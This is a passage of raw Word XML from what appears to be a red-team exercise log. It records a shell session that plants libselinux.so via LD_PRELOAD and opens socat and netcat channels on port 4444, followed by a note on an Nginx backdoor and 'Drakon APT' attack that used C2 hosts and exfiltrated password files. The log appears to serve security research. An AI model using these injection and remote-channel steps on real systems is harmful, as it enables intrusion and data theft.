      </w:r>
    </w:p>
    <w:p w14:paraId="39356580" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>antilepton       convulsedly        electrovection   imposthume        moondown         out850            preppie          sclerosed       test             Videos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5083BF7C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>antisepticize    copintank          empiricism       individua         Music            out857            prereceiver      semifamine      tinkler          vilified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6955C5AC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>aponeurotomy     critters           energeticalness  interrogatedness  navaids          out864            preserver        sequentially    tormentor        vitrean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8D3838" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>autocombustible  croakers           eversible        jna-95354950      neurologically   out888            pricklyback      sfree           tortiously       woolsack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B282ED" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>aviarists        cyanogenesis       exacuate         jockeydom         nitidulid        out892            projections      sheaths         touchless        work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79559BFB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>backup           dealers            farandmen        joinable          nocktat          out912            proterandry      sigatoka        trachile         wurtzilite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644DDCE0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bandagers        decimator          files            lewisite          nodeexporter     overskirt         psychomoral      skiffles        trainload        xvnc4viewer.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1F5E69" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>barong           depardieu          finnick          libselinux.so     noncrossover     overspender       Public           spathyema       treckpot         yentas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40759E3D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bedlamised       deposes            flashpan         liverheartedness  noncuratively    overwinning       pulpwoods        speirs          trillil          yett</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B44578F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bombacaceous     deracialize        fleabanes        load_helper.ko    nonrecombinant   palestine         pumpkinish       spiky           tripleness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DFFB25" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>botulinuses      dermobranchia      genesiacal       machine           nonshatter       panada            quislings        spirae          ubuntu_pkgs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B26706" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>boult            Desktop            geoponical       __MACOSX          olivil           parochialization  ratement         stairbuilding   ubuntu_pkgs.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75272DF0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>brewer           desuete            glx_alsa_675.ko  medicamentary     osphere          passwd            ravi             stringsman      unadoptably</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1A4B71" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>broider          directeur          grains           merfold           otarian          phyllostomatidae  read_scan.ko     subcircularity  undeteriorated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACD269C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bushidos         disincrustion      grooper          merogenetic       out10            Pictures          referendaryship  subimbricative  unempty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4F128D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@ta1-trace-1:~$ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538789EE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C36015" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F49B955" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-1:~$ mv libselinux.so /lib/libselinux.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A57B218" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>mv: cannot move ‘libselinux.so’ to ‘/lib/libselinux.so’: Permission denied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31580FBF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-1:~$ sudo mv libselinux.so /lib/libselinux.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A60E1BD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[sudo] password for admin: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C0D0DA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D18EFB9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30B14C59" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCAB864" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-1:/lib$ /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2810A7CD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-1:/lib$ export LD_PRELOAD=/lib/libselinux.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2202244A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-1:/lib$ /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4736E2EE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-1:/lib$ env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAC9935" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>XDG_SESSION_ID=17586</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7E4A70" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>TERM=screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FA8FC3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SHELL=/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056A2D52" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SSH_CLIENT=128.55.12.122 51790 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55595178" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LD_PRELOAD=/lib/libselinux.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9748A6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SSH_TTY=/dev/pts/4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCB0342" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>USER=admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4348FDF4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62434099" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIL=/var/mail/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491207F2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C7AB00" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PWD=/lib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF801E8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LANG=en_US.UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6DF222" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SHLVL=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEEB573" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>HOME=/home/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B3F856" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LOGNAME=admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4AC2F3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SSH_CONNECTION=128.55.12.122 51790 128.55.12.117 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7825B798" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LESSOPEN=| /usr/bin/lesspipe %s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0141D2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>XDG_RUNTIME_DIR=/run/user/1003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D46FC03" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LESSCLOSE=/usr/bin/lesspipe %s %s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273F006B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_=/usr/bin/env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FFD021" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE051DD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB156E3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-1:/lib$ setsid socat TCP4-LISTEN:4444,reuseaddr,fork EXEC:cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045F26DF" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-1:/lib$ execvp: No such file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5162FBC6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D61AEB3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0777E5B8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-bg-gen:~$ socat -,raw,echo=0 TCP:128.55.12.117:4444,bind=61040</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB46B69" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>2019/05/17 09:33:42 socat[23517] E connect(5, AF=2 128.55.12.117:4444, 16): Connection refused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D894B06" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                                              admin@ta51-bg-gen:~$ socat -,raw,echo=0 TCP:128.55.12.117:4444,bind=61040</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071001A5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>2019/05/17 09:33:59 socat[23556] E connect(5, AF=2 128.55.12.117:4444, 16): Connection refused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1BCFF7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2205F2FA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594715CB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-1:/lib$ netstat -na | grep 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171BF6B3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D3DE5C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-1:/lib$ socat TCP4-LISTEN:4444,reuseaddr,fork EXEC:cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29064524" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Fatal Python error: Py_Initialize: Unable to get the locale encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7097481F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LookupError: no codec search functions registered: can't find encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B6C97D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Aborted (core dumped)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5CC6E8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B478DEB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131C4FD5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-1:/lib$ nc -k -l 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402F6197" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>socat -,raw,echo=0 TCP:128.55.12.117:4444,bind=61040</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BFB512" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>^C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79925DDC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F27B788" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:38</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B8CAED" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-1:/lib$ exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194DBCF1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B01C94" w14:textId="7349F524" w:rsidR="00CE2C66" w:rsidRPr="00650FDF" w:rsidRDefault="005A0BE6" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Conn</w:t>
      </w:r>
      <w:r w:rsidR="00650FDF">
        <w:t>ection to 128.55.12.117 closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AC4BA3" w14:textId="213225A8" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="205" w:name="_Toc12600115"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>10:16 -- CADETS 1 and 2 -- Nginx Drakon APT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205"/>
    </w:p>
    <w:p w14:paraId="43DE7532" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Reran the attack from yesterday using Nginx backdoor and Drakon APT.  The attacker first tried to attack from an outside host, using 98.23.182.25:80 to download Drakon APT and 108.192.100.31:80 for C2.  That failed, though, so the attacker switched to ta1-pivot-2 for the attack C2.  The malformed HTTP POST was sent from 128.55.12.167 and resulted in C2 to 128.55.12.233:80.  The attacker then repeated the same attack against ta1-cadets-1, exfil’ing /etc/password from both hosts.  The connections were both left open for later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29559B2A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
